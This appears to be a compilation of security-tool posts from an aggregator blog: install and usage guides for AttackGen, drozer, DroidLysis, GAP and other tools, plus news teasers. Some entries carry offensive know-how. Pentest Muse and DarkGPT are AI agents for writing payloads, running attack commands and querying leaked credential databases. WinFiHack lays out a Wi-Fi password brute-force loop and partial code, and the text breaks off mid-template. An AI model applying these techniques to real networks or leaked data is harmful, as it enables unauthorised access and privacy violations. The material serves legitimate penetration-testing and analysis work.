    • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
    • Available as a Docker container image for easy deployment.
    • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


    Releases

    v0.4 (current)

    What's new? Why is it useful?
    Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
    Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
    Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
    Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

    v0.3

    What's new? Why is it useful?
    Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

    - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
    LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

    - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
    Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
    Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

    v0.2

    What's new? Why is it useful?
    Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

    - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
    User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
    Improved error handling for missing API keys - Improved user experience.
    Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

    v0.1

    Initial release.

    Requirements

    • Recent version of Python.
    • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
    • OpenAI API key.
    • LangChain API key (optional) - see LangSmith Setup section below for further details.
    • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

    Installation

    Option 1: Cloning the Repository

1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
2. Change directory into the cloned repository:
cd attackgen
3. Install the required Python packages:
pip install -r requirements.txt

    Option 2: Using Docker

    1. Pull the Docker container image from Docker Hub:
    docker pull mrwadams/attackgen

    LangSmith Setup

    If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

    If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

    Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Make sure to place this file in the ./data/ directory within the repository.

    Running AttackGen

    After the data setup, you can run AttackGen with the following command:

    streamlit run πŸ‘‹_Welcome.py

    You can also try the app on Streamlit Community Cloud.

    Usage

    Running AttackGen

    Option 1: Running the Streamlit App Locally

1. Run the Streamlit app:
streamlit run πŸ‘‹_Welcome.py
2. Open your web browser and navigate to the URL provided by Streamlit.
3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Option 2: Using the Docker Container Image

    1. Run the Docker container:
    docker run -p 8501:8501 mrwadams/attackgen

This command will start the container and map port 8501 (the default for Streamlit apps) from the container to your host machine.
2. Open your web browser and navigate to http://localhost:8501.
3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Generating Scenarios

    Standard Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Threat Group Scenarios page.
    5. Select the Threat Actor Group that you want to simulate.
    6. Click on 'Generate Scenario' to create the incident response scenario.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Custom Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Custom Scenario page.
    5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
    6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

    Contributing

    I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

    Licence

    This project is licensed under GNU GPLv3.



    ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

    By: Zion3R


    ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


    ~ Hilali Abdel

    USAGE

    python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

    [Add new Device]

    python3 smartthings.py -a 192.168.1.1

python3 smartthings.py -s --type TPLINK

    python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVE and PoC [firmware and device type]


Scan device for open UPnP ports

    python3 smartthings.py -s --scan upnp --id

Get data from MQTT 'subscribe'

    python3 smartthings.py -s --scan mqtt --id



    Drozer - The Leading Security Assessment Framework For Android

    By: Zion3R


    drozer (formerly Mercury) is the leading security testing framework for Android.

    drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used, with little to no programming experience required, to show the impact of leaving certain components exported on a device.

    drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


    Docker Container

    To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

    • The Docker container and basic setup instructions can be found here.
    • Instructions on building your own Docker container can be found here.

    Manual Building and Installation

    Prerequisites

1. Python 2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

2. Protobuf 2.6 or greater

3. Pyopenssl 16.2 or greater

4. Twisted 10.2 or greater

5. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

6. Android Debug Bridge

    Building Python wheel

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python setup.py bdist_wheel

    Installing Python wheel

    sudo pip install dist/drozer-2.x.x-py2-none-any.whl

    Building for Debian/Ubuntu/Mint

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make deb

    Installing .deb (Debian/Ubuntu/Mint)

    sudo dpkg -i drozer-2.x.x.deb

    Building for Redhat/Fedora/CentOS

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make rpm

    Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -i drozer-2.x.x-1.noarch.rpm

    Building for Windows

    NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python.exe setup.py bdist_msi

    Installing .msi (Windows)

    Run dist/drozer-2.x.x.win-x.msi 

    Usage

    Installing the Agent

    Drozer can be installed using Android Debug Bridge (adb).

    Download the latest Drozer Agent here.

    $ adb install drozer-agent-2.x.x.apk

    Starting a Session

    You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

    We will use the server embedded in the drozer Agent to do this.

    If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

    $ adb forward tcp:31415 tcp:31415

    Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

    Then, on your PC, connect using the drozer Console:

    On Linux:

    $ drozer console connect

    On Windows:

    > drozer.bat console connect

    If using a real device, the IP address of the device on the network must be specified:

    On Linux:

    $ drozer console connect --server 192.168.0.10

    On Windows:

    > drozer.bat console connect --server 192.168.0.10

    You should be presented with a drozer command prompt:

    selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
    dz>

    The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

    You are now ready to start exploring the device.

    Command Reference

    Command Description
    run Executes a drozer module
    list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
    shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module.
    clean Remove temporary files stored by drozer on the Android device.
    contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
    echo Print text to the console.
    exit Terminate the drozer session.
    help Display help about a particular command or module.
    load Load a file containing drozer commands, and execute them in sequence.
    module Find and install additional drozer modules from the Internet.
    permissions Display a list of the permissions granted to the drozer Agent.
    set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
    unset Remove a named variable that drozer passes to any Linux shells that it spawns.

    License

    drozer is released under a 3-clause BSD License. See LICENSE for full details.

    Contacting the Project

    drozer is Open Source software, made great by contributions from the community.

    Bug reports, feature requests, comments and questions can be submitted here.



    DroidLysis - Property Extractor For Android Apps

    By: Zion3R


    DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

    DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


    Installing DroidLysis

    1. Install required system packages
    sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
2. Install Android disassembly tools:

• Apktool,
• Baksmali, and optionally
• Dex2jar and
• Procyon (obsolete; note that Procyon only works with Java 8, not Java 11).
    $ mkdir -p ~/softs
    $ cd ~/softs
    $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
    $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
    $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
    $ unzip dex-tools-v2.4.zip
    $ rm -f dex-tools-v2.4.zip
3. Get DroidLysis from the Git repository (preferred) or from pip

    Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

    $ python3 -m venv venv
    $ source ./venv/bin/activate
    (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

    Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

4. Configure conf/general.conf. In particular, make sure to replace /home/axelle with your appropriate directories.
    [tools]
    apktool = /home/axelle/softs/apktool_2.9.3.jar
    baksmali = /home/axelle/softs/baksmali-2.5.2.jar
    dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
    procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
    keytool = /usr/bin/keytool
    ...
5. Run it:
    python3 ./droidlysis3.py --help

    Configuration

    The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

    Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

    Usage

    DroidLysis uses Python 3. To launch it and get options:

    droidlysis --help

    For example, test it on Signal's APK:

    droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

    DroidLysis outputs:

    • A summary on the console (see image above)
• The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum (see the naming sketch after this list). For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
    • A database (by default, SQLite droidlysis.db) containing properties it noticed.
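
As a small illustration of that naming convention (a sketch only; DroidLysis also sanitizes the filename, so the real directory name may differ slightly):

import hashlib
import os

# Sketch of the output subdirectory naming: <sample filename>-<sha256 of contents>.
# The real tool additionally sanitizes the filename (e.g. strips punctuation).
sample = "Signal-website-universal-release-6.26.3.apk"
with open(sample, "rb") as f:
    digest = hashlib.sha256(f.read()).hexdigest()
print(os.path.join("/tmp", f"{os.path.basename(sample)}-{digest}"))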

    Options

    Get usage with droidlysis --help

• The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.

• When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by the option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is the option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see the SQLite database section below).

    • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

• DroidLysis's analysis does not inspect known third-party SDKs by default, i.e. it won't report any suspicious activity from these. If you want them to be inspected, use the option --no-kit-exception. This usually results in many more detected properties for the sample, as SDKs (e.g. advertisement SDKs) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

    Sample output directory (--output DIR)

    This directory contains (when applicable):

    • A readable AndroidManifest.xml
    • Readable resources in res
• Libraries in lib, assets in assets
    • Disassembled Smali code: smali (and others)
    • Package meta information: META-INF
    • Package contents when simply unzipped in ./unzipped
    • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

    The following files are generated by DroidLysis:

    • autoanalysis.md: lists each pattern DroidLysis detected and where.
    • report.md: same as what was printed on the console

    If you do not need the sample output directory to be generated, use the option --clearoutput.

    Import trackers from Exodus etc (--import-exodus)

    $ python3 ./droidlysis3.py --import-exodus --verbose
    Processing file: ./droidurl.pyc ...
    DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
    DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
    DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
    DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
    DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
    DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

    Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database

If you want to process a directory of samples, you'll probably want to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table corresponds to a given sample, and each column is a property DroidLysis tracks.

For example, to retrieve the filename, SHA256 sum and smali properties of all samples in the database:

    sqlite> select sha256, sanitized_basename, smali_properties from samples;
    f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
    ...
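
The same query can be run programmatically; here is a minimal sketch with Python's sqlite3 module (assuming the default droidlysis.db database and the samples table described above):

import sqlite3

# Pull the SHA256 sum, sanitized filename and smali properties of every sample.
conn = sqlite3.connect("droidlysis.db")
for sha256, name, smali_properties in conn.execute(
        "SELECT sha256, sanitized_basename, smali_properties FROM samples"):
    print(sha256, name)
    print(smali_properties)
conn.close()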

    Property patterns

    What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consists of:

    • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
• a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
    • a description (optional): explains the importance of the property and what it means.
    [send_sms]
    pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
    description=Sending SMS messages
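
To see how such a pattern behaves (a plain-Python sketch, not DroidLysis's own matching code), the send_sms regexp above can be applied to a line of Smali with the re module:

import re

# The send_sms pattern from smali.conf, matched against one line of Smali code.
pattern = r";->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage"
smali_line = ("invoke-virtual {v0, v1, v2, v3, v4, v5}, "
              "Landroid/telephony/SmsManager;->sendTextMessage(...)V")
if re.search(pattern, smali_line):
    print("send_sms property detected")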

    Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add the option --import-exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows about and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

    Afterwards, you may want to sort your kit.conf file:

    import configparser
    import collections
    import os

    config = configparser.ConfigParser({}, collections.OrderedDict)
    config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
    # Order all sections alphabetically
    config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf', 'w') as f:
    config.write(f)

    Updates

    • v3.4.6 - Detecting manifest feature that automatically loads APK at install
    • v3.4.5 - Creating a writable user kit.conf file
    • v3.4.4 - Bug fix #14
    • v3.4.3 - Using configuration files
    • v3.4.2 - Adding import of Exodus Privacy Trackers
    • v3.4.1 - Removed dependency to Androguard
    • v3.4.0 - Multidex support
    • v3.3.1 - Improving detection of Base64 strings
    • v3.3.0 - Dumping data to JSON
    • v3.2.1 - IP address detection
    • v3.2.0 - Dex2jar is optional
    • v3.1.0 - Detection of Base64 strings


    PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers

    The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign. PyPI said "new project creation and new user registration" was temporarily halted to mitigate what it said was a "malware upload campaign." The incident was resolved 10 hours later, on March 28, 2024, at 12:56

    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse

2. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials

Cybersecurity researchers have shed light on a tool referred to as AndroxGh0st that's used to target Laravel applications and steal sensitive data. "It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs researcher Kashinath T Pattan said. "Classified as an SMTP cracker, it exploits SMTP

    GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

    By: Zion3R

    This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


    TL;DR

    Installation

1. Visit the Jython Official Site, and download the latest standalone JAR file, e.g. jython-standalone-2.7.3.jar.
    2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
    3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
    4. Download the GAP.py and requirements.txt from this project and place in the same directory.
    5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
    6. Go to the Extensions -> Installed and click Add under Burp Extensions.
    7. Select Extension type of Python and select the GAP.py file.

    Using

    1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

    Or you can right click a request or response in any other context and select GAP from the Extensions menu.

2. Then go to the GAP tab to see the results:

    IMPORTANT Notes

If you don't need one of the modes, then uncheck it, as results will be quicker.

If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately, this can make it a lot slower. It will be more efficient if you run it for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.

If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

    It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

    The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!
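
As a rough idea of the kind of processing the Words mode performs (a hedged sketch in plain Python, not GAP's actual Jython code), extracting candidate wordlist entries from a response body might look like:

import re
from bs4 import BeautifulSoup

# Pull visible text out of an HTML response and split it into unique candidate words.
html = "<html><body><h1>Reset your password</h1><p>session token expired</p></body></html>"
text = BeautifulSoup(html, "html.parser").get_text(" ")
words = sorted(set(re.findall(r"[A-Za-z0-9_-]{3,}", text)))
print(words)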

    In Depth Instructions

    Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

    NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

    TODO

    • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
• Add an option to not add the Tentative Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
    • Improve performance of the link finding regular expressions.
    • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
    • Deal with other size displays and font sizes better to make sure all controls are viewable.
    • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
    • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

    Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β˜• (I could use the caffeine!)

    🀘 /XNL-h4ck3r



    DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

    By: Zion3R


    DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


    Prerequisites

    Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

    Environment Setup

    1. Clone the Repository

    First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT

2. Configure Environment Variables

    You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

    DEHASHED_API_KEY="your_dehashed_api_key_here"
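
One common way to load such variables in Python (an assumption for illustration; DarkGPT may read the .env file differently) is the python-dotenv package:

import os
from dotenv import load_dotenv

# Load variables from the local .env file and read the DeHashed API key.
load_dotenv()
dehashed_key = os.getenv("DEHASHED_API_KEY")
print("DEHASHED_API_KEY loaded:", bool(dehashed_key))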

3. Install Dependencies

    This project requires certain Python packages to run. Install them by running the following command:

pip install -r requirements.txt

4. Run the project:

python3 main.py



    WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

    By: Zion3R


WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.


    Installation

    The packages are minimal or nearly none πŸ˜…. The package install command is:

    pip install rich pyfiglet

    Thats it.


    Features

    So listing the features:

    • Overall Features:
    • We can use custom interfaces or non-default interfaces to run the attack.
    • Well-defined way of using netsh and listing and utilizing targets.
    • Upgradeability
    • Code-Wise Features:
    • Interactive menu-driven system with rich.
• Versatility in using interfaces, targets, and password files.

    How it works

    So this is how the bruteforcer works:

    • Provide Interface:

    • The user is required to provide the network interface for the tool to use.

    • By default, the interface is set to Wi-Fi.

    • Search and Set Target:

    • The user must search for and select the target network.

    • During this process, the tool performs the following sub-steps:

      • Disconnects all active network connections for the selected interface.
      • Searches for all available networks within range.
    • Input Password File:

    • The user inputs the path to the password file.

    • The default path for the password file is ./wordlist/default.txt.

    • Run the Attack:

    • With the target set and the password file ready, the tool is now prepared to initiate the attack.

    • Attack Procedure:

    • The attack involves iterating through each password in the provided file.
    • For each password, the following steps are taken:
      • A custom XML configuration for the connection attempt is generated and stored.
      • The tool attempts to connect to the target network using the generated XML and the current password.
      • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
      • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
  • This loop continues until a successful ping response is received, indicating a successful connection attempt (a minimal sketch of this loop follows below).
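
A minimal Python sketch of that loop (illustrative only, not WinFiHack's code; the profile XML is a simplified WPA2-PSK template, "TargetSSID" is a placeholder, and the interface name and wordlist path follow the defaults mentioned above):

import subprocess
import tempfile
import time

# Simplified WPA2-PSK Wi-Fi profile template (real profiles may need more elements).
PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>{ssid}</name>
  <SSIDConfig><SSID><name>{ssid}</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
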